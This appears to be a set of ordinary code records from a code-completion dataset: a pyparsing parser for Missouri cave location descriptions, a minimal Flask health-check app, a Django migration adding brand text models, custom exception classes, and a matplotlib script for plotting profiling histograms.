mapAlias\n ) + Suppress(onKeyword)\n quadrangleKeyword = Literal('Quadrangle') + Literal('map')\n quadrangleName = Group(OneOrMore(~quadrangleKeyword + Word(alphas + \"-'.\"))\n ).setResultsName('name').setParseAction(lambda name: ' '.join(name[0]))\n quadrangle = Group(quadrangleStatus + quadrangleName).setResultsName('quad'\n ) + Suppress(quadrangleKeyword)\n description = Group(ZeroOrMore(Word(alphanums + printables))\n ).setResultsName('description').setParseAction(lambda desc: ' '.\n join(desc[0]))\n location = caveName + aliquotPart + section + Suppress(','\n ) + township + Suppress(',') + range_info + Suppress(','\n ) + county + quadrangle + description\n return location.parseString(details)\n\n\nif __name__ == '__main__':\n if len(sys.argv) < 2:\n print('ERROR: pass in the filename as the second argument.')\n print(' $ python {0} /path/to/file.txt'.format(sys.argv[0]))\n exit()\n filepath = sys.argv[1]\n with open(filepath) as f:\n raw_text = f.read()\n raw_caves = raw_text.split('\\n')\n caves = []\n for raw_cave_text in raw_caves:\n raw_cave_text = raw_cave_text.strip()\n if raw_cave_text:\n try:\n cave = parse_cave_details(raw_cave_text)\n caves.append({'Cave name': cave.name, 'Alias': cave.quad.\n alias, 'On map': cave.quad.is_on_map, 'Quad': cave.quad\n .name, 'County': cave.county, 'State': 'MO',\n 'Principal Meridian Code': 5, 'Township Number': cave.\n township.number, 'Township Fraction': 0,\n 'Township Direction': cave.township.direction,\n 'Range Number': cave.range.number, 'Range Fraction': 0,\n 'Range Direction': cave.range.direction, 'Section':\n cave.section[0], 'Section Division': ''.join(cave.\n aliquot), 'Township Duplicate': 0, 'Description':\n raw_cave_text})\n except:\n print('=' * 80)\n print('ERROR: unexpected format for {0}'.format(cave.name))\n print(raw_cave_text)\n import traceback\n print(traceback.format_exc())\n print('\\t' + '\\n\\t'.join([str(x) for x in sys.exc_info()]))\n print('Skipping this cave for the next one')\n 
else:\n sections = ' or '.join(cave.section)\n output_path = os.path.basename(filepath).split('.')[0] + '.csv'\n print('#' * 80)\n print(\"{0} caves processed! Saving to '{1}'.\".format(len(caves),\n output_path))\n with open(output_path, 'wb') as f:\n cave_csv = csv.DictWriter(f, fieldnames=caves[0].keys())\n try:\n cave_csv.writeheader()\n except:\n header = {}\n for k in caves[0].keys():\n header[k] = k\n cave_csv.writerow(header)\n cave_csv.writerows(caves)\n",
"step-4": "import sys\nimport os\nfrom pyparsing import *\nimport csv\n\n\ndef parse_cave_details(details):\n aliquotQuadrantID = Literal('NE') | Literal('SE') | Literal('SW'\n ) | Literal('NW')\n aliquotQuadrantString = aliquotQuadrantID + Suppress('1/4')\n aliquotHalfString = oneOf('N E S W') + Suppress('1/2')\n aliquotPart = Group(ZeroOrMore(aliquotQuadrantString | aliquotHalfString)\n ).setResultsName('aliquot').setParseAction(lambda kwd: ' '.join(kwd[0])\n )\n sectionToken = Suppress(oneOf('S s') + Literal('ec') + Optional('.'))\n sectionNumber = Word(nums)\n section = Group(sectionToken + sectionNumber + ZeroOrMore(Suppress('or'\n ) + sectionNumber)).setResultsName('section')\n afterEndOfCaveName = (aliquotHalfString | aliquotQuadrantString |\n sectionToken)\n caveName = Group(OneOrMore(~afterEndOfCaveName + Word(printables))\n ).setResultsName('name').setParseAction(lambda name: ' '.join(name[0]))\n townshipDirection = oneOf('N S').setResultsName('direction')\n townshipNumber = Word(nums).setResultsName('number')\n township = Suppress('T.') + Group(townshipNumber + townshipDirection\n ).setResultsName('township') + Suppress('.')\n rangeDirection = oneOf('E W').setResultsName('direction')\n rangeNumber = Word(nums).setResultsName('number')\n range_info = Suppress('R.') + Group(rangeNumber + rangeDirection\n ).setResultsName('range') + Suppress('.')\n countyKeyword = Literal('County')\n countyName = Group(OneOrMore(~countyKeyword + Word(alphas + \"-'.\"))\n ).setResultsName('county').setParseAction(lambda c: ' '.join(c[0]))\n county = countyName + Suppress('County')\n notShownOnQuad = (Literal('Not') + Suppress('s')).setParseAction(lambda\n x: False)\n shownOnQuad = Literal('S').setParseAction(lambda x: True)\n onKeyword = Literal('on')\n mapAlias = Group(OneOrMore(~onKeyword + Word(printables))).setParseAction(\n lambda alias: ' '.join(alias[0])).setResultsName('alias')\n quadrangleStatus = (shownOnQuad | notShownOnQuad).setResultsName(\n 'is_on_map') + 
Suppress('hown') + Optional(Suppress('as') + mapAlias\n ) + Suppress(onKeyword)\n quadrangleKeyword = Literal('Quadrangle') + Literal('map')\n quadrangleName = Group(OneOrMore(~quadrangleKeyword + Word(alphas + \"-'.\"))\n ).setResultsName('name').setParseAction(lambda name: ' '.join(name[0]))\n quadrangle = Group(quadrangleStatus + quadrangleName).setResultsName('quad'\n ) + Suppress(quadrangleKeyword)\n description = Group(ZeroOrMore(Word(alphanums + printables))\n ).setResultsName('description').setParseAction(lambda desc: ' '.\n join(desc[0]))\n location = caveName + aliquotPart + section + Suppress(','\n ) + township + Suppress(',') + range_info + Suppress(','\n ) + county + quadrangle + description\n return location.parseString(details)\n\n\nif __name__ == '__main__':\n if len(sys.argv) < 2:\n print('ERROR: pass in the filename as the second argument.')\n print(' $ python {0} /path/to/file.txt'.format(sys.argv[0]))\n exit()\n filepath = sys.argv[1]\n with open(filepath) as f:\n raw_text = f.read()\n raw_caves = raw_text.split('\\n')\n caves = []\n for raw_cave_text in raw_caves:\n raw_cave_text = raw_cave_text.strip()\n if raw_cave_text:\n try:\n cave = parse_cave_details(raw_cave_text)\n caves.append({'Cave name': cave.name, 'Alias': cave.quad.\n alias, 'On map': cave.quad.is_on_map, 'Quad': cave.quad\n .name, 'County': cave.county, 'State': 'MO',\n 'Principal Meridian Code': 5, 'Township Number': cave.\n township.number, 'Township Fraction': 0,\n 'Township Direction': cave.township.direction,\n 'Range Number': cave.range.number, 'Range Fraction': 0,\n 'Range Direction': cave.range.direction, 'Section':\n cave.section[0], 'Section Division': ''.join(cave.\n aliquot), 'Township Duplicate': 0, 'Description':\n raw_cave_text})\n except:\n print('=' * 80)\n print('ERROR: unexpected format for {0}'.format(cave.name))\n print(raw_cave_text)\n import traceback\n print(traceback.format_exc())\n print('\\t' + '\\n\\t'.join([str(x) for x in sys.exc_info()]))\n 
print('Skipping this cave for the next one')\n else:\n sections = ' or '.join(cave.section)\n output_path = os.path.basename(filepath).split('.')[0] + '.csv'\n print('#' * 80)\n print(\"{0} caves processed! Saving to '{1}'.\".format(len(caves),\n output_path))\n with open(output_path, 'wb') as f:\n cave_csv = csv.DictWriter(f, fieldnames=caves[0].keys())\n try:\n cave_csv.writeheader()\n except:\n header = {}\n for k in caves[0].keys():\n header[k] = k\n cave_csv.writerow(header)\n cave_csv.writerows(caves)\n",
"step-5": "import sys\r\nimport os\r\nfrom pyparsing import *\r\nimport csv\r\n\r\n\r\ndef parse_cave_details(details):\r\n ##########################################################################\r\n # Define the Bretz Grammar.\r\n # Sample cave description:\r\n # Boring Caverns SE1/4 NW1/4 sec. 16, T. 37 N., R. 10 W., Pulaski County Not shown on Waynesville Quadrangle map The mouth of this cave ...\\n\r\n # Another Cave S1/2 sec. 15, T. 36 N., R. 12 W., Pulaski County Not shown on Waynesville Quadrangle map There are two large caves...\\n\r\n # Something Bridge Sec. 15 or 22, T. 36 N., R. 13 W., Pulaski County Not shown on Richland Quadrangle map This cave is near Ozark...\\n\r\n #\r\n # CAVE ::= CAVE_NAME [ALIQUOT_PART] SECTION, TOWNSHIP, RANGE, COUNTY QUAD_MAP DESCRIPTION\r\n # ALIQUOT_PART ::= (((NE|SE|SW|NW)1/4)|((N|E|S|W)1/2))*\r\n # SECTION ::= (S|s)ec. num+\r\n # TOWNSHIP ::= T. num+ TOWNSHIP_DIR.\r\n # TOWNSHIP_DIR ::= N|S\r\n # RANGE ::= R. num+ RANGE_DIR.\r\n # RANGE_DIR ::= E|W\r\n # COUNTY = WORD+ County\r\n # QUAD_MAP = (Not s|S)hown on QUAD Quadrangle map\r\n # QUAD = WORD+\r\n # DESCRIPTION = WORD+\r\n aliquotQuadrantID = Literal(\"NE\") |\\\r\n Literal(\"SE\") |\\\r\n Literal(\"SW\") |\\\r\n Literal(\"NW\")\r\n aliquotQuadrantString = aliquotQuadrantID + Suppress(\"1/4\")\r\n aliquotHalfString = oneOf(\"N E S W\") + Suppress(\"1/2\")\r\n aliquotPart = Group(ZeroOrMore(aliquotQuadrantString | aliquotHalfString))\\\r\n .setResultsName(\"aliquot\")\\\r\n .setParseAction(lambda kwd: \" \".join(kwd[0]))\r\n\r\n sectionToken = Suppress(oneOf(\"S s\") + Literal(\"ec\") + Optional(\".\"))\r\n sectionNumber = Word(nums)\r\n section = Group(\r\n sectionToken \\\r\n + sectionNumber \\\r\n + ZeroOrMore(Suppress(\"or\") + sectionNumber)\r\n ).setResultsName(\"section\")\r\n\r\n afterEndOfCaveName = aliquotHalfString | aliquotQuadrantString | sectionToken\r\n caveName = Group(OneOrMore(~afterEndOfCaveName + Word(printables)))\\\r\n 
.setResultsName('name')\\\r\n .setParseAction(lambda name: \" \".join(name[0]))\r\n\r\n townshipDirection = oneOf(\"N S\").setResultsName(\"direction\")\r\n townshipNumber = Word(nums).setResultsName(\"number\")\r\n township = Suppress(\"T.\") \\\r\n + Group(townshipNumber + townshipDirection).setResultsName(\"township\")\\\r\n + Suppress('.')\r\n\r\n rangeDirection = oneOf(\"E W\").setResultsName(\"direction\")\r\n rangeNumber = Word(nums).setResultsName(\"number\")\r\n range_info = Suppress(\"R.\") \\\r\n + Group(rangeNumber + rangeDirection).setResultsName(\"range\")\\\r\n + Suppress('.')\r\n\r\n countyKeyword = Literal(\"County\")\r\n countyName = Group(OneOrMore(~countyKeyword + Word(alphas+\"-'.\")))\\\r\n .setResultsName(\"county\")\\\r\n .setParseAction(lambda c: \" \".join(c[0]))\r\n county = countyName + Suppress(\"County\")\r\n\r\n notShownOnQuad = (Literal(\"Not\") + Suppress(\"s\"))\\\r\n .setParseAction(lambda x: False)\r\n shownOnQuad = Literal(\"S\").setParseAction(lambda x: True)\r\n onKeyword = Literal(\"on\")\r\n mapAlias = Group(OneOrMore(~onKeyword + Word(printables)))\\\r\n .setParseAction(lambda alias: \" \".join(alias[0]))\\\r\n .setResultsName(\"alias\")\r\n quadrangleStatus = (shownOnQuad | notShownOnQuad).setResultsName(\"is_on_map\")\\\r\n + Suppress(\"hown\") \\\r\n + Optional(Suppress('as') + mapAlias)\\\r\n + Suppress(onKeyword)\r\n quadrangleKeyword = Literal(\"Quadrangle\") + Literal(\"map\")\r\n quadrangleName = Group(OneOrMore(~quadrangleKeyword + Word(alphas+\"-'.\")))\\\r\n .setResultsName(\"name\")\\\r\n .setParseAction(lambda name: \" \".join(name[0]))\r\n quadrangle = Group(quadrangleStatus + quadrangleName).setResultsName(\"quad\") \\\r\n + Suppress(quadrangleKeyword)\r\n\r\n description = Group(ZeroOrMore(Word(alphanums + printables)))\\\r\n .setResultsName(\"description\")\\\r\n .setParseAction(lambda desc: \" \".join(desc[0]))\r\n\r\n location = caveName \\\r\n + aliquotPart \\\r\n + section + Suppress(',') \\\r\n + 
township + Suppress(',') \\\r\n + range_info + Suppress(',')\\\r\n + county \\\r\n + quadrangle \\\r\n + description\r\n\r\n return location.parseString(details)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n if len(sys.argv) < 2:\r\n print(\"ERROR: pass in the filename as the second argument.\")\r\n print(\" $ python {0} /path/to/file.txt\".format(sys.argv[0]))\r\n exit()\r\n\r\n filepath = sys.argv[1]\r\n with open(filepath) as f:\r\n raw_text = f.read()\r\n\r\n raw_caves = raw_text.split(\"\\n\")\r\n caves = []\r\n for raw_cave_text in raw_caves:\r\n raw_cave_text = raw_cave_text.strip()\r\n if raw_cave_text:\r\n try:\r\n cave = parse_cave_details(raw_cave_text)\r\n caves.append({\r\n 'Cave name': cave.name,\r\n 'Alias': cave.quad.alias,\r\n 'On map': cave.quad.is_on_map,\r\n 'Quad': cave.quad.name,\r\n 'County': cave.county,\r\n 'State': 'MO',\r\n 'Principal Meridian Code': 5,\r\n 'Township Number': cave.township.number,\r\n 'Township Fraction': 0,\r\n 'Township Direction': cave.township.direction,\r\n 'Range Number': cave.range.number,\r\n 'Range Fraction': 0,\r\n 'Range Direction': cave.range.direction,\r\n 'Section': cave.section[0],\r\n 'Section Division': \"\".join(cave.aliquot),\r\n 'Township Duplicate': 0,\r\n 'Description': raw_cave_text,\r\n })\r\n\r\n except:\r\n print(\"=\"*80)\r\n print(\"ERROR: unexpected format for {0}\".format(cave.name))\r\n print(raw_cave_text)\r\n import traceback\r\n print(traceback.format_exc())\r\n print(\"\\t\" + \"\\n\\t\".join([str(x) for x in sys.exc_info()]))\r\n print(\"Skipping this cave for the next one\")\r\n else:\r\n sections = \" or \".join(cave.section)\r\n #print(\"=\"*80)\r\n #print(\"{1} := {0.aliquot} Sect. {2}, T. {0.township.number} {0.township.direction}., R. 
{0.range.number} {0.range.direction}., in {0.county} County on the {0.quad.name} quad map.\".format(cave, cave.name, sections))\r\n #print(\" Marked on map as {0}\".format(cave.quad.alias if cave.quad.alias else cave.name) if cave.quad.is_on_map else \" Not on map\")\r\n\r\n output_path = os.path.basename(filepath).split(\".\")[0] + \".csv\"\r\n print(\"#\"*80)\r\n print(\"{0} caves processed! Saving to '{1}'.\".format(len(caves), output_path))\r\n with open(output_path, 'wb') as f:\r\n cave_csv = csv.DictWriter(f, fieldnames=caves[0].keys())\r\n try:\r\n cave_csv.writeheader()\r\n \r\n except: # Versions before 2.7 of Python do not have csv with writeheader().\r\n header = {}\r\n for k in caves[0].keys():\r\n header[k] = k\r\n \r\n cave_csv.writerow(header)\r\n\r\n cave_csv.writerows(caves)\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from flask import Flask
import os
app = Flask(__name__)
@app.route("/healthz")
def healthz():
return "ok"
@app.route("/alive")
def alive():
return "ok"
@app.route("/hello")
# def healthz(): # introduces application crash bug
def hello():
myhost = os.uname()[1]
body = ("V1 - Hello World! - %s" % myhost)
# body = ("V2 - Hello World! - %s" % myhost)
return body
if __name__ == "__main__":
from waitress import serve
serve(app, host="0.0.0.0", port=80)
|
normal
|
{
"blob_id": "0259fddbe3ce030030a508ce7118a6a03930aa51",
"index": 7375,
"step-1": "<mask token>\n\n\[email protected]('/healthz')\ndef healthz():\n return 'ok'\n\n\[email protected]('/alive')\ndef alive():\n return 'ok'\n\n\[email protected]('/hello')\ndef hello():\n myhost = os.uname()[1]\n body = 'V1 - Hello World! - %s' % myhost\n return body\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\[email protected]('/healthz')\ndef healthz():\n return 'ok'\n\n\[email protected]('/alive')\ndef alive():\n return 'ok'\n\n\[email protected]('/hello')\ndef hello():\n myhost = os.uname()[1]\n body = 'V1 - Hello World! - %s' % myhost\n return body\n\n\nif __name__ == '__main__':\n from waitress import serve\n serve(app, host='0.0.0.0', port=80)\n",
"step-3": "<mask token>\napp = Flask(__name__)\n\n\[email protected]('/healthz')\ndef healthz():\n return 'ok'\n\n\[email protected]('/alive')\ndef alive():\n return 'ok'\n\n\[email protected]('/hello')\ndef hello():\n myhost = os.uname()[1]\n body = 'V1 - Hello World! - %s' % myhost\n return body\n\n\nif __name__ == '__main__':\n from waitress import serve\n serve(app, host='0.0.0.0', port=80)\n",
"step-4": "from flask import Flask\nimport os\napp = Flask(__name__)\n\n\[email protected]('/healthz')\ndef healthz():\n return 'ok'\n\n\[email protected]('/alive')\ndef alive():\n return 'ok'\n\n\[email protected]('/hello')\ndef hello():\n myhost = os.uname()[1]\n body = 'V1 - Hello World! - %s' % myhost\n return body\n\n\nif __name__ == '__main__':\n from waitress import serve\n serve(app, host='0.0.0.0', port=80)\n",
"step-5": "from flask import Flask\nimport os\n\napp = Flask(__name__)\n\n\[email protected](\"/healthz\")\ndef healthz():\n return \"ok\"\n\n\[email protected](\"/alive\")\ndef alive():\n return \"ok\"\n\n\[email protected](\"/hello\")\n# def healthz(): # introduces application crash bug\ndef hello():\n myhost = os.uname()[1]\n body = (\"V1 - Hello World! - %s\" % myhost)\n # body = (\"V2 - Hello World! - %s\" % myhost)\n return body\n\n\nif __name__ == \"__main__\":\n from waitress import serve\n serve(app, host=\"0.0.0.0\", port=80)\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-03-31 07:54
from __future__ import unicode_literals
import codenerix.fields
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('codenerix_products', '0005_remove_product_name'),
]
operations = [
migrations.CreateModel(
name='BrandTextEN',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Created')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Updated')),
('meta_title', models.CharField(blank=True, max_length=70, null=True, verbose_name='Meta Title')),
('meta_description', models.CharField(blank=True, max_length=70, null=True, verbose_name='Meta Description')),
('description_short', codenerix.fields.WysiwygAngularField(blank=True, null=True, verbose_name='Description short')),
('description_long', codenerix.fields.WysiwygAngularField(blank=True, null=True, verbose_name='Description long')),
('slug', models.CharField(max_length=250, unique=True, verbose_name='Slug')),
('name', models.CharField(blank=True, max_length=250, null=True, verbose_name='Name')),
('public', models.BooleanField(default=False, verbose_name='Public')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='BrandTextES',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Created')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Updated')),
('meta_title', models.CharField(blank=True, max_length=70, null=True, verbose_name='Meta Title')),
('meta_description', models.CharField(blank=True, max_length=70, null=True, verbose_name='Meta Description')),
('description_short', codenerix.fields.WysiwygAngularField(blank=True, null=True, verbose_name='Description short')),
('description_long', codenerix.fields.WysiwygAngularField(blank=True, null=True, verbose_name='Description long')),
('slug', models.CharField(max_length=250, unique=True, verbose_name='Slug')),
('name', models.CharField(blank=True, max_length=250, null=True, verbose_name='Name')),
('public', models.BooleanField(default=False, verbose_name='Public')),
],
options={
'abstract': False,
},
),
migrations.RemoveField(
model_name='brand',
name='name',
),
migrations.RemoveField(
model_name='brand',
name='slug',
),
migrations.AddField(
model_name='brandtextes',
name='brand',
field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='es', to='codenerix_products.Brand'),
),
migrations.AddField(
model_name='brandtexten',
name='brand',
field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='en', to='codenerix_products.Brand'),
),
]
|
normal
|
{
"blob_id": "0aed35827e6579f7a9434d252d0b9150ab24adf9",
"index": 4573,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('codenerix_products', '0005_remove_product_name')]\n operations = [migrations.CreateModel(name='BrandTextEN', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('created', models.DateTimeField(\n auto_now_add=True, verbose_name='Created')), ('updated', models.\n DateTimeField(auto_now=True, verbose_name='Updated')), (\n 'meta_title', models.CharField(blank=True, max_length=70, null=True,\n verbose_name='Meta Title')), ('meta_description', models.CharField(\n blank=True, max_length=70, null=True, verbose_name=\n 'Meta Description')), ('description_short', codenerix.fields.\n WysiwygAngularField(blank=True, null=True, verbose_name=\n 'Description short')), ('description_long', codenerix.fields.\n WysiwygAngularField(blank=True, null=True, verbose_name=\n 'Description long')), ('slug', models.CharField(max_length=250,\n unique=True, verbose_name='Slug')), ('name', models.CharField(blank\n =True, max_length=250, null=True, verbose_name='Name')), ('public',\n models.BooleanField(default=False, verbose_name='Public'))],\n options={'abstract': False}), migrations.CreateModel(name=\n 'BrandTextES', fields=[('id', models.AutoField(auto_created=True,\n primary_key=True, serialize=False, verbose_name='ID')), ('created',\n models.DateTimeField(auto_now_add=True, verbose_name='Created')), (\n 'updated', models.DateTimeField(auto_now=True, verbose_name=\n 'Updated')), ('meta_title', models.CharField(blank=True, max_length\n =70, null=True, verbose_name='Meta Title')), ('meta_description',\n models.CharField(blank=True, max_length=70, null=True, verbose_name\n ='Meta Description')), ('description_short', codenerix.fields.\n WysiwygAngularField(blank=True, null=True, verbose_name=\n 'Description short')), ('description_long', codenerix.fields.\n WysiwygAngularField(blank=True, null=True, verbose_name=\n 'Description long')), ('slug', 
models.CharField(max_length=250,\n unique=True, verbose_name='Slug')), ('name', models.CharField(blank\n =True, max_length=250, null=True, verbose_name='Name')), ('public',\n models.BooleanField(default=False, verbose_name='Public'))],\n options={'abstract': False}), migrations.RemoveField(model_name=\n 'brand', name='name'), migrations.RemoveField(model_name='brand',\n name='slug'), migrations.AddField(model_name='brandtextes', name=\n 'brand', field=models.OneToOneField(on_delete=django.db.models.\n deletion.CASCADE, related_name='es', to='codenerix_products.Brand')\n ), migrations.AddField(model_name='brandtexten', name='brand',\n field=models.OneToOneField(on_delete=django.db.models.deletion.\n CASCADE, related_name='en', to='codenerix_products.Brand'))]\n",
"step-4": "from __future__ import unicode_literals\nimport codenerix.fields\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n dependencies = [('codenerix_products', '0005_remove_product_name')]\n operations = [migrations.CreateModel(name='BrandTextEN', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('created', models.DateTimeField(\n auto_now_add=True, verbose_name='Created')), ('updated', models.\n DateTimeField(auto_now=True, verbose_name='Updated')), (\n 'meta_title', models.CharField(blank=True, max_length=70, null=True,\n verbose_name='Meta Title')), ('meta_description', models.CharField(\n blank=True, max_length=70, null=True, verbose_name=\n 'Meta Description')), ('description_short', codenerix.fields.\n WysiwygAngularField(blank=True, null=True, verbose_name=\n 'Description short')), ('description_long', codenerix.fields.\n WysiwygAngularField(blank=True, null=True, verbose_name=\n 'Description long')), ('slug', models.CharField(max_length=250,\n unique=True, verbose_name='Slug')), ('name', models.CharField(blank\n =True, max_length=250, null=True, verbose_name='Name')), ('public',\n models.BooleanField(default=False, verbose_name='Public'))],\n options={'abstract': False}), migrations.CreateModel(name=\n 'BrandTextES', fields=[('id', models.AutoField(auto_created=True,\n primary_key=True, serialize=False, verbose_name='ID')), ('created',\n models.DateTimeField(auto_now_add=True, verbose_name='Created')), (\n 'updated', models.DateTimeField(auto_now=True, verbose_name=\n 'Updated')), ('meta_title', models.CharField(blank=True, max_length\n =70, null=True, verbose_name='Meta Title')), ('meta_description',\n models.CharField(blank=True, max_length=70, null=True, verbose_name\n ='Meta Description')), ('description_short', codenerix.fields.\n WysiwygAngularField(blank=True, null=True, verbose_name=\n 'Description short')), 
('description_long', codenerix.fields.\n WysiwygAngularField(blank=True, null=True, verbose_name=\n 'Description long')), ('slug', models.CharField(max_length=250,\n unique=True, verbose_name='Slug')), ('name', models.CharField(blank\n =True, max_length=250, null=True, verbose_name='Name')), ('public',\n models.BooleanField(default=False, verbose_name='Public'))],\n options={'abstract': False}), migrations.RemoveField(model_name=\n 'brand', name='name'), migrations.RemoveField(model_name='brand',\n name='slug'), migrations.AddField(model_name='brandtextes', name=\n 'brand', field=models.OneToOneField(on_delete=django.db.models.\n deletion.CASCADE, related_name='es', to='codenerix_products.Brand')\n ), migrations.AddField(model_name='brandtexten', name='brand',\n field=models.OneToOneField(on_delete=django.db.models.deletion.\n CASCADE, related_name='en', to='codenerix_products.Brand'))]\n",
"step-5": "# -*- coding: utf-8 -*-\n# Generated by Django 1.10.5 on 2017-03-31 07:54\nfrom __future__ import unicode_literals\n\nimport codenerix.fields\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('codenerix_products', '0005_remove_product_name'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='BrandTextEN',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('created', models.DateTimeField(auto_now_add=True, verbose_name='Created')),\n ('updated', models.DateTimeField(auto_now=True, verbose_name='Updated')),\n ('meta_title', models.CharField(blank=True, max_length=70, null=True, verbose_name='Meta Title')),\n ('meta_description', models.CharField(blank=True, max_length=70, null=True, verbose_name='Meta Description')),\n ('description_short', codenerix.fields.WysiwygAngularField(blank=True, null=True, verbose_name='Description short')),\n ('description_long', codenerix.fields.WysiwygAngularField(blank=True, null=True, verbose_name='Description long')),\n ('slug', models.CharField(max_length=250, unique=True, verbose_name='Slug')),\n ('name', models.CharField(blank=True, max_length=250, null=True, verbose_name='Name')),\n ('public', models.BooleanField(default=False, verbose_name='Public')),\n ],\n options={\n 'abstract': False,\n },\n ),\n migrations.CreateModel(\n name='BrandTextES',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('created', models.DateTimeField(auto_now_add=True, verbose_name='Created')),\n ('updated', models.DateTimeField(auto_now=True, verbose_name='Updated')),\n ('meta_title', models.CharField(blank=True, max_length=70, null=True, verbose_name='Meta Title')),\n ('meta_description', models.CharField(blank=True, max_length=70, null=True, verbose_name='Meta Description')),\n ('description_short', 
codenerix.fields.WysiwygAngularField(blank=True, null=True, verbose_name='Description short')),\n ('description_long', codenerix.fields.WysiwygAngularField(blank=True, null=True, verbose_name='Description long')),\n ('slug', models.CharField(max_length=250, unique=True, verbose_name='Slug')),\n ('name', models.CharField(blank=True, max_length=250, null=True, verbose_name='Name')),\n ('public', models.BooleanField(default=False, verbose_name='Public')),\n ],\n options={\n 'abstract': False,\n },\n ),\n migrations.RemoveField(\n model_name='brand',\n name='name',\n ),\n migrations.RemoveField(\n model_name='brand',\n name='slug',\n ),\n migrations.AddField(\n model_name='brandtextes',\n name='brand',\n field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='es', to='codenerix_products.Brand'),\n ),\n migrations.AddField(\n model_name='brandtexten',\n name='brand',\n field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='en', to='codenerix_products.Brand'),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from compas.geometry import Frame
|
normal
|
{
"blob_id": "d4e3751b2d4796c72be497007fe4c7d8ca67e18e",
"index": 6874,
"step-1": "<mask token>\n",
"step-2": "from compas.geometry import Frame\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
class Error(Exception):
pass
class TunnelInstanceError(Error):
def __init__(self, expression, message):
self.expression = expression
self.message = message
class TunnelManagerError(Error):
def __init__(self, expression, message):
self.expression = expression
self.message = message
|
normal
|
{
"blob_id": "661b622708692bd9cd1b3399835f332c86e39bf6",
"index": 8835,
"step-1": "<mask token>\n\n\nclass TunnelManagerError(Error):\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass TunnelManagerError(Error):\n\n def __init__(self, expression, message):\n self.expression = expression\n self.message = message\n",
"step-3": "<mask token>\n\n\nclass TunnelInstanceError(Error):\n <mask token>\n\n\nclass TunnelManagerError(Error):\n\n def __init__(self, expression, message):\n self.expression = expression\n self.message = message\n",
"step-4": "<mask token>\n\n\nclass TunnelInstanceError(Error):\n\n def __init__(self, expression, message):\n self.expression = expression\n self.message = message\n\n\nclass TunnelManagerError(Error):\n\n def __init__(self, expression, message):\n self.expression = expression\n self.message = message\n",
"step-5": "class Error(Exception):\n pass\n\n\nclass TunnelInstanceError(Error):\n\n def __init__(self, expression, message):\n self.expression = expression\n self.message = message\n\n\nclass TunnelManagerError(Error):\n\n def __init__(self, expression, message):\n self.expression = expression\n self.message = message\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
# dg_kernel plots
import os
import re
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.colors as mcolors
import csv
import sys
NE_SIZE = 128
TITLE_SIZE = 35
TEXT_SIZE = 30
MARKER_SIZE = 10
LINE_WIDTH = 5
colors = { idx:cname for idx, cname in enumerate(mcolors.cnames) }
eventname = 'L1_DCM'
callstacklevel = 7
FREQ_THRESHOLD = 0.02
ROOT = '/global/homes/g/grnydawn/trepo/temp/cylcworkspace/extrae_HSW/cgroup/folding/02242017_1353/codeline'
# read histogram file
def read_histogram(histofile):
histodict = {}
with open(histofile, 'rb') as f:
reader = csv.reader(f, delimiter='\t')
try:
exclude_item = []
for i, row in enumerate(reader):
if len(row)<1: continue
if i==0:
name = []
for j, item in enumerate(row[1:]):
if len(item)<1:
exclude_item += [ j ]
continue
name += [ item ]
histodict['Head'] = name
else:
numval = []
for j, item in enumerate(row[1:]):
if j in exclude_item: continue
try:
numval += [ float(item) ]
except Exception as e:
if len(item)<1:
numval += [ 0.0 ]
else:
print e
histodict[row[0]] = numval
except csv.Error as e:
sys.exit('file %s, line %d: %s' % (histofile, reader.line_num, e))
return histodict
def draw_histogram(xname, yval, title, xlabel, ylabel, filename, xrange=None):
fig = plt.figure()
ax = fig.add_subplot(111)
ax.set_title(title, fontsize=TITLE_SIZE)
ax.set_xlabel(xlabel, fontsize=TEXT_SIZE)
ax.set_ylabel(ylabel, fontsize=TEXT_SIZE)
if xrange: XL = xrange
else: XL = [0, len(xname)]
ax.set_xticks(range(len(xname)))
newname = []
for i, xn in enumerate(xname):
if i%1==0:
newname += [ xn ]
else:
newname += [ "" ]
ax.set_xticklabels(newname)
xval = np.arange(len(xname))[XL[0]:XL[1]]
yval = yval[XL[0]:XL[1]]
YL = [0, max(yval)*1.5]
ax.axis(XL + YL)
gridlines = ax.get_xaxis().get_gridlines()
for gl in gridlines:
gl.set_visible(False)
